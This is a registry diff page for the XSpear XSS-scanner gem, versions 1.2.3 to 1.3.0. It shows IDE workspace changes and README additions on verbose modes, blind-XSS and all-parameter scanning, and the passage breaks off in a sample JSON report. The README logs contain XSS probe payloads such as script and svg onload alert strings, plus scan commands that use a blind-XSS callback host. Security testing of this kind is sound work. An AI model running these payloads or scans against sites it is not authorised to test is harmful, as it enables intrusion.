RubyGems - XSpear - Versions diffs - 1.2.3 → 1.3.0 - Mend

XSpear 1.2.3 → 1.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e424021e52b442bddc6cd364b9c5cb6a59e70490d68b06ac08c804e2d05ffeae
-  data.tar.gz: ec290b0fd740ea40235cec72ed97912edbca7e2851a56b689ed85b2f46c2cbba
+  metadata.gz: 3a4ad44a0682af3bee97123748084c84a9e99173dd54a4c3cb6b7987ff2a5849
+  data.tar.gz: f8f3fc5a8ea264728dcd49d3257d6abcee7bd2e06b91b651aa8ebcd5ff21dcd0
 SHA512:
-  metadata.gz: bd758a2fe9745c9d028b7b3cd97360340fc0a390e4b15690bd310972b2b711d2b2a28cf60cab3c573b697daf5a3524c627aad20e5f3545f44e395dd9f1b3dc2d
-  data.tar.gz: '024388dfb74f53d07cbc7e1891799211138d30ee646579449e3bef63590b3e2f1017381dfcaeb4cd12da8bd0498095db19d7a8c3903d0e3cf3898f373cf741fe'
+  metadata.gz: ae4acb32ea4ba0951bf4a52b6cb89bc14187a834603bd973440252a64bbdeb0beecb74003518e79feb903601d6f81af5de4fc9f88aa799791a6ae008d04f2744
+  data.tar.gz: d192f703cb73d0e2cdd1d6a9a815d48961c0b5576659331842de7110755cec9b2d494d71fba235d8ab8b844f6f32ef413cb719a89f77574933d784ccfab07d4a

data/.idea/workspace.xml CHANGED Viewed

@@ -3,7 +3,8 @@
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
       <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/XSpear-1.2.2.gem" beforeDir="false" />
+      <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
@@ -21,31 +22,29 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/exe/XSpear">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="-1138">
-              <caret line="28" column="34" selection-start-line="28" selection-start-column="34" selection-end-line="28" selection-end-column="34" />
+            <state relative-caret-position="489">
+              <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
-          <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="331">
-              <caret line="666" column="13" lean-forward="true" selection-start-line="666" selection-start-column="13" selection-end-line="666" selection-end-column="13" />
+        <entry file="file://$PROJECT_DIR$/README.md">
+          <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+            <state split_layout="SPLIT">
+              <first_editor relative-caret-position="6480">
+                <caret line="432" column="38" lean-forward="true" selection-start-line="432" selection-start-column="38" selection-end-line="432" selection-end-column="38" />
+              </first_editor>
+              <second_editor />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/bin/console">
-          <provider selected="true" editor-type-id="text-editor" />
-        </entry>
-      </file>
-      <file pinned="false" current-in-tab="false">
-        <entry file="file://$USER_HOME$/.rvm/rubies/ruby-2.4.6/lib/ruby/site_ruby/2.4.0/rubygems/core_ext/kernel_require.rb">
+        <entry file="file://$PROJECT_DIR$/config.json">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="795">
-              <caret line="53" selection-start-line="53" selection-end-line="53" />
+            <state relative-caret-position="105">
+              <caret line="7" column="13" selection-end-line="8" selection-end-column="1" />
             </state>
           </provider>
         </entry>
@@ -53,47 +52,60 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="1095">
+            <state relative-caret-position="28">
               <caret line="73" selection-start-line="73" selection-end-line="73" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+      <file pinned="false" current-in-tab="true">
+        <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="225">
-              <caret line="15" column="28" selection-start-line="15" selection-start-column="28" selection-end-line="15" selection-end-column="28" />
+            <state relative-caret-position="325">
+              <caret line="183" column="6" selection-start-line="183" selection-start-column="6" selection-end-line="183" selection-end-column="6" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+      <file pinned="false" current-in-tab="false">
+        <entry file="file://$PROJECT_DIR$/bin/console">
+          <provider selected="true" editor-type-id="text-editor" />
+        </entry>
+      </file>
+      <file pinned="false" current-in-tab="false">
+        <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="15">
-              <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+            <state relative-caret-position="195">
+              <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
+        <entry file="file://$APPLICATION_HOME_DIR$/rubystubs23/string.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="105">
-              <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
+            <state relative-caret-position="237">
+              <caret line="302" column="6" selection-start-line="302" selection-start-column="6" selection-end-line="302" selection-end-column="6" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/Rakefile">
-          <provider selected="true" editor-type-id="text-editor" />
+        <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="15">
+              <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+            </state>
+          </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file:///usr/local/bin/rake">
-          <provider selected="true" editor-type-id="text-editor" />
+        <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="480">
+              <caret line="44" column="47" selection-start-line="44" selection-start-column="35" selection-end-line="44" selection-end-column="47" />
+            </state>
+          </provider>
         </entry>
       </file>
     </leaf>
@@ -103,6 +115,15 @@
       <find>BLINDNOTDETECTED</find>
       <find>@all</find>
       <find>@reflected_params</find>
+      <find>@thread</find>
+      <find>thread</find>
+      <find>STATIC</find>
+      <find>@progress</find>
+      <find>@progre</find>
+      <find>@verbose</find>
+      <find>puts</find>
+      <find>not fil</find>
+      <find>EH</find>
     </findStrings>
   </component>
   <component name="Git.Settings">
@@ -111,22 +132,23 @@
   <component name="IdeDocumentHistory">
     <option name="CHANGED_PATHS">
       <list>
-        <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
-        <option value="$PROJECT_DIR$/XSpear.gemspec" />
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
-        <option value="$PROJECT_DIR$/README.md" />
+        <option value="$PROJECT_DIR$/config.json" />
+        <option value="$PROJECT_DIR$/XSpear.gemspec" />
+        <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
         <option value="$PROJECT_DIR$/exe/XSpear" />
-        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+        <option value="$PROJECT_DIR$/README.md" />
+        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
       </list>
     </option>
   </component>
-  <component name="ProjectFrameBounds" extendedState="6" fullScreen="true">
-    <option name="x" value="-1920" />
-    <option name="y" value="-643" />
-    <option name="width" value="1920" />
-    <option name="height" value="1080" />
+  <component name="ProjectFrameBounds" extendedState="6">
+    <option name="x" value="-1879" />
+    <option name="y" value="-620" />
+    <option name="width" value="1036" />
+    <option name="height" value="1057" />
   </component>
   <component name="ProjectLevelVcsManager" settingsEditedManually="true">
     <ConfirmationsSetting value="2" id="Add" />
@@ -237,42 +259,7 @@
       <workItem from="1564151699165" duration="2494000" />
       <workItem from="1564413097342" duration="11274000" />
       <workItem from="1574090247432" duration="1799000" />
-      <workItem from="1577115206395" duration="3266000" />
-    </task>
-    <task id="LOCAL-00017" summary="1.0.0 Final commit">
-      <created>1563553596470</created>
-      <option name="number" value="00017" />
-      <option name="presentableId" value="LOCAL-00017" />
-      <option name="project" value="LOCAL" />
-      <updated>1563553596470</updated>
-    </task>
-    <task id="LOCAL-00018" summary="Edit readme">
-      <created>1563554102958</created>
-      <option name="number" value="00018" />
-      <option name="presentableId" value="LOCAL-00018" />
-      <option name="project" value="LOCAL" />
-      <updated>1563554102958</updated>
-    </task>
-    <task id="LOCAL-00019" summary="modify dependency rspec">
-      <created>1563555157935</created>
-      <option name="number" value="00019" />
-      <option name="presentableId" value="LOCAL-00019" />
-      <option name="project" value="LOCAL" />
-      <updated>1563555157935</updated>
-    </task>
-    <task id="LOCAL-00020" summary="modify dependency rspec">
-      <created>1563555198677</created>
-      <option name="number" value="00020" />
-      <option name="presentableId" value="LOCAL-00020" />
-      <option name="project" value="LOCAL" />
-      <updated>1563555198677</updated>
-    </task>
-    <task id="LOCAL-00021" summary="modify dependency rspec">
-      <created>1563638920975</created>
-      <option name="number" value="00021" />
-      <option name="presentableId" value="LOCAL-00021" />
-      <option name="project" value="LOCAL" />
-      <updated>1563638920975</updated>
+      <workItem from="1577115206395" duration="20463000" />
     </task>
     <task id="LOCAL-00022" summary="Change Badge(version)">
       <created>1563639231885</created>
@@ -582,11 +569,46 @@
       <option name="project" value="LOCAL" />
       <updated>1577118338926</updated>
     </task>
-    <option name="localTasksCounter" value="66" />
+    <task id="LOCAL-00066" summary="(1.2.3) Bug fix #35">
+      <created>1577118594609</created>
+      <option name="number" value="00066" />
+      <option name="presentableId" value="LOCAL-00066" />
+      <option name="project" value="LOCAL" />
+      <updated>1577118594609</updated>
+    </task>
+    <task id="LOCAL-00067" summary="(1.3) fixed #38 (Added path scan)">
+      <created>1577596645830</created>
+      <option name="number" value="00067" />
+      <option name="presentableId" value="LOCAL-00067" />
+      <option name="project" value="LOCAL" />
+      <updated>1577596645830</updated>
+    </task>
+    <task id="LOCAL-00068" summary="(1.3) fixed #39 (Added inJS scan)">
+      <created>1577597049653</created>
+      <option name="number" value="00068" />
+      <option name="presentableId" value="LOCAL-00068" />
+      <option name="project" value="LOCAL" />
+      <updated>1577597049653</updated>
+    </task>
+    <task id="LOCAL-00069" summary="(1.3) fixed #37 (Added -c --config options)">
+      <created>1577612095200</created>
+      <option name="number" value="00069" />
+      <option name="presentableId" value="LOCAL-00069" />
+      <option name="project" value="LOCAL" />
+      <updated>1577612095200</updated>
+    </task>
+    <task id="LOCAL-00070" summary="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)">
+      <created>1577626433478</created>
+      <option name="number" value="00070" />
+      <option name="presentableId" value="LOCAL-00070" />
+      <option name="project" value="LOCAL" />
+      <updated>1577626433478</updated>
+    </task>
+    <option name="localTasksCounter" value="71" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="55309000" />
+    <option name="totallyTimeSpent" value="72506000" />
   </component>
   <component name="TodoView">
     <todo-panel id="selected-file">
@@ -598,10 +620,10 @@
     </todo-panel>
   </component>
   <component name="ToolWindowManager">
-    <frame x="-1920" y="-643" width="1920" height="1080" extended-state="6" />
+    <frame x="-1879" y="-620" width="1879" height="1057" extended-state="6" />
     <editor active="true" />
     <layout>
-      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13045794" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13336962" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -614,9 +636,9 @@
       <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
       <window_info anchor="bottom" id="Database Changes" order="8" />
       <window_info anchor="bottom" id="Version Control" order="9" />
-      <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.32970297" />
+      <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.2373057" />
       <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
-      <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
+      <window_info anchor="bottom" id="Messages" order="12" weight="0.32857144" />
       <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
       <window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
       <window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
@@ -627,11 +649,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
-    <MESSAGE value="(1.0.8) Add event handler &amp; html5 XSS code, new pattern" />
-    <MESSAGE value="(1.0.8) Releases 1.0.8" />
-    <MESSAGE value="(1.0.9)[Fixed #11] Add check 'useful code'" />
-    <MESSAGE value="(1.0.9)[Fixed #12] Modify XSpear Struct(option.* =&gt; options [hash])" />
     <MESSAGE value="(1.0.9)[Fixed #10] Add raw file read options" />
     <MESSAGE value="(1.0.9)[Fixed #13] Remove add pattern from StandardError in 'makeQueryPattern'" />
     <MESSAGE value="(1.0.9) Releases 1.0.9 / Add --raw options, code refactoring, fixed bugs" />
@@ -652,7 +669,12 @@
     <MESSAGE value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
     <MESSAGE value="(1.2.1) Added ''-a(--test-all-params)' mode(#27) and bug fix(#34)" />
     <MESSAGE value="(1.2.2) Remove Debug Code" />
-    <option name="LAST_COMMIT_MESSAGE" value="(1.2.2) Remove Debug Code" />
+    <MESSAGE value="(1.2.3) Bug fix #35" />
+    <MESSAGE value="(1.3) fixed #38 (Added path scan)" />
+    <MESSAGE value="(1.3) fixed #39 (Added inJS scan)" />
+    <MESSAGE value="(1.3) fixed #37 (Added -c --config options)" />
+    <MESSAGE value="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -675,16 +697,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/README.md">
-      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-        <state split_layout="SPLIT">
-          <first_editor relative-caret-position="180">
-            <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
-          </first_editor>
-          <second_editor />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$USER_HOME$/.rvm/rubies/ruby-2.4.6/lib/ruby/site_ruby/2.4.0/rubygems/core_ext/kernel_require.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="795">
@@ -692,30 +704,47 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+    <entry file="file://$PROJECT_DIR$/Rakefile">
+      <provider selected="true" editor-type-id="text-editor" />
+    </entry>
+    <entry file="file:///usr/local/bin/rake">
+      <provider selected="true" editor-type-id="text-editor" />
+    </entry>
+    <entry file="file://$PROJECT_DIR$/Gemfile">
+      <provider selected="true" editor-type-id="text-editor" />
+    </entry>
+    <entry file="file://$PROJECT_DIR$/config.json">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="1095">
-          <caret line="73" selection-start-line="73" selection-end-line="73" />
+        <state relative-caret-position="105">
+          <caret line="7" column="13" selection-end-line="8" selection-end-column="1" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
+    <entry file="file://$APPLICATION_HOME_DIR$/rubystubs23/string.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="105">
-          <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
+        <state relative-caret-position="237">
+          <caret line="302" column="6" selection-start-line="302" selection-start-column="6" selection-end-line="302" selection-end-column="6" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/Rakefile">
-      <provider selected="true" editor-type-id="text-editor" />
-    </entry>
-    <entry file="file:///usr/local/bin/rake">
-      <provider selected="true" editor-type-id="text-editor" />
+    <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/options-2.3.2/lib/options.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="15">
+          <caret line="1" column="21" selection-start-line="1" selection-start-column="21" selection-end-line="1" selection-end-column="21" />
+        </state>
+      </provider>
     </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="225">
-          <caret line="15" column="28" selection-start-line="15" selection-start-column="28" selection-end-line="15" selection-end-column="28" />
+        <state relative-caret-position="195">
+          <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="480">
+          <caret line="44" column="47" selection-start-line="44" selection-start-column="35" selection-end-line="44" selection-end-column="47" />
         </state>
       </provider>
     </entry>
@@ -724,22 +753,39 @@
     </entry>
     <entry file="file://$PROJECT_DIR$/exe/XSpear">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="-1138">
-          <caret line="28" column="34" selection-start-line="28" selection-start-column="34" selection-end-line="28" selection-end-column="34" />
+        <state relative-caret-position="489">
+          <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="331">
-          <caret line="666" column="13" lean-forward="true" selection-start-line="666" selection-start-column="13" selection-end-line="666" selection-end-column="13" />
+        <state relative-caret-position="15">
+          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+    <entry file="file://$PROJECT_DIR$/README.md">
+      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+        <state split_layout="SPLIT">
+          <first_editor relative-caret-position="6480">
+            <caret line="432" column="38" lean-forward="true" selection-start-line="432" selection-start-column="38" selection-end-line="432" selection-end-column="38" />
+          </first_editor>
+          <second_editor />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="15">
-          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+        <state relative-caret-position="28">
+          <caret line="73" selection-start-line="73" selection-end-line="73" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="325">
+          <caret line="183" column="6" selection-start-line="183" selection-start-column="6" selection-end-line="183" selection-end-column="6" />
         </state>
       </provider>
     </entry>

data/README.md CHANGED Viewed

@@ -8,22 +8,29 @@ XSpear is XSS Scanner on ruby gems
 ## Key features
 - Pattern matching based XSS scanning
 - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
-- Testing request/response for XSS protection bypass and reflected params<br>
+- Testing request/response for XSS protection bypass and reflected(or all) params<br>
   + Reflected Params
+  + All params(for blind xss, anytings)
   + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
 - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
 - Dynamic/Static Analysis
   + Find SQL Error pattern
   + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
   + Analysis Other headers..(Server version, Content-Type, etc...)
+  + XSS Testing to URI Path
 - Scanning from Raw file(Burp suite, ZAP Request)
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
 - Testing at selected parameters
 - Support output format `cli` `json`
   + cli: summary, filtered rule(params), Raw Query
-- Support Verbose level (quit / nomal / raw data)
+- Support Verbose level (0~3)
+  + 0: quite mode(only result)
+  + 1: show scanning status(default)
+  + 2: show scanning logs
+  + 3: show detail log(req/res)
 - Support custom callback code to any test various attack vectors
+- Support Config file
 ## Installation
@@ -53,6 +60,7 @@ If you configured it to install automatically in the Gem library, but it behaves
 $ gem install colorize
 $ gem install selenium-webdriver
 $ gem install terminal-table
+$ gem install progress_bar
 ```
 ## Usage on cli
@@ -60,11 +68,13 @@ $ gem install terminal-table
 ```
 Usage: xspear -u [target] -[options] [value]
 [ e.g ]
-$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
+$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
+    -a, --test-all-params            [optional] test to all params(include not reflected)
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
@@ -73,11 +83,12 @@ $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
                                       + with XSS Hunter, ezXSS, HBXSS, etc...
                                       + e.g : -b https://hahwul.xss.ht
     -t, --threads=NUMBER             [optional] thread , default: 10
-    -o, --output=FILENAME            [optional] Save JSON Result
-    -v, --verbose=1~3                [optional] Show log depth
-                                      + Default value: 2
-                                      + v=1 : quite mode
-                                      + v=2 : show scanning log
+    -o, --output=FORMAT              [optional] Output format (cli , json)
+    -c, --config=FILENAME            [optional] Using config.json
+    -v, --verbose=0~3                [optional] Show log depth
+                                      + v=0 : quite mode(only result)
+                                      + v=1 : show scanning status(default)
+                                      + v=2 : show scanning logs
                                       + v=3 : show detail log(req/res)
     -h, --help                       Prints this help
         --version                    Show XSpear version
@@ -91,40 +102,218 @@ $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
 - (M)EDIUM: medium level issue
 - (H)IGH: high level issue
+### Verbose Mode
+**[0] quite mode(show only result)**
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
+you see report
+```
+**[1] show progress bar (default)**
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
+[*] analysis request..
+[*] used test-reflected-params mode(default)
+[*] creating a test query [for reflected 2 param + blind XSS ]
+[*] test query generation is complete. [249 query]
+[*] starting XSS Scanning. [10 threads]
+[#######################################] [249/249] [100.00%] [01:05] [00:00] [  3.83/s]
+...
+you see report
+```
+**[2] show scanning logs**
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
+[*] analysis request..
+[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
+[-] [22:42:41] [200/OK] 'STATIC' not reflected
+[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
+[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
+[*] used test-reflected-params mode(default)
+[*] creating a test query [for reflected 2 param + blind XSS ]
+[*] test query generation is complete. [249 query]
+[*] starting XSS Scanning. [10 threads]
+[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
+[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
+[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
+[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
+[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
+...
+you see report
+```
+**[3] show scanning detail logs**
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
+[*] analysis request..
+[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
+[ Request ]
+{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
+[ Response ]
+{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
+[-] [22:56:21] [200/OK] 'STATIC' not reflected
+[-] [22:56:21] [200/OK] cat=123rEfe6 in url
+...
+[*] used test-reflected-params mode(default)
+[*] creating a test query [for reflected 2 param + blind XSS ]
+[*] test query generation is complete. [249 query]
+[*] starting XSS Scanning. [10 threads]
+...
+[ Request ]
+{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
+[ Response ]
+{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
+[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
+...
+you see report
+```
 ### Case by Case
 **Scanning XSS**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 ```
-**json output(with silence mode)**
+**Only JSON output**
 ```
-$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
 ```
-**detail log**
-```
-$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
-```
-**set thread**
+**Set scanning thread**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
 ```
-**testing at selected parameters**
+**Testing at selected parameters**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
 ```
-**testing blind xss**<br>
+**Testing at all parameters**<br>
+(This option is tested with or without reflection.)
+```
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
+```
+**Testing blind xss(all params)**<br>
 (Should be used as much as possible because Blind XSS is everywhere)<br>
 ```
-$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
 # Set your blind xss host. <-b options>
 ```
+**for Pipeline**<br>
+```
+$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
+# -u : target
+# -b : testing blind xss
+# -a : test all params(test to not reflected param)
+# -v : verbose, not showing logs at value 1.
+# -o : output optios, json!
+```
+result json data
+```
+{
+    "starttime": "2019-12-25 00:02:58 +0900",
+    "endtime": "2019-12-25 00:03:31 +0900",
+    "issue_count": 25,
+    "issue_list": [{
+        "id": 0,
+        "type": "INFO",
+        "issue": "DYNAMIC ANALYSIS",
+        "method": "GET",
+        "param": "cat",
+        "payload": "XsPeaR\"",
+        "description": "Found SQL Error Pattern"
+    }, {
+        "id": 1,
+        "type": "INFO",
+        "issue": "STATIC ANALYSIS",
+        "method": "GET",
+        "param": "-",
+        "payload": "<original query>",
+        "description": "Found Server: nginx/1.4.1"
+    }, {
+        "id": 2,
+        "type": "INFO",
+        "issue": "STATIC ANALYSIS",
